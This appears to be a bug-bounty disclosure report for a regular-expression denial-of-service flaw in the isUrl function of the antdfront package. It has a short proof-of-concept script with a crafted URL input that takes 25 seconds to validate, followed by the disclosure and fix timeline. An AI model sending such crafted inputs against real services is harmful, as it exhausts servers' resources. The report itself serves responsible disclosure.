Inefficient Regular Expression Complexity in x-neuron/antdfront

Valid

Reported on

Sep 2nd 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the antdFront package. An attacker that is able to provide crafted input to the isUrl(input) function may cause an application to consume an excessive amount of CPU.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs

// PoC.mjs
import {isUrl } from './antdFront/src/utils/is.js';
var time = Date.now();
isUrl('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost+" ms")

Execute the following command in another terminal:

git clone and make changes like setting "type": "module" in the package.json
node poc.mjs

Check the Output:

Time taken to validate : 25051 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should be done within 1-10 milliseconds, but in the above case, it's 25 sec.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

ready-research submitted a

patch

2 years ago

We have contacted a member of the x-neuron/antdfront team and are waiting to hear back 2 years ago

We have sent a second follow up to the x-neuron/antdfront team. We will try again in 10 days. 2 years ago

We have sent a third and final follow up to the x-neuron/antdfront team. This report is now considered stale. 2 years ago

50岁的星空 validated this vulnerability a year ago

ready-research has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

50岁的星空 marked this as fixed in 2.3.1 with commit ab135d a year ago

ready-research has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation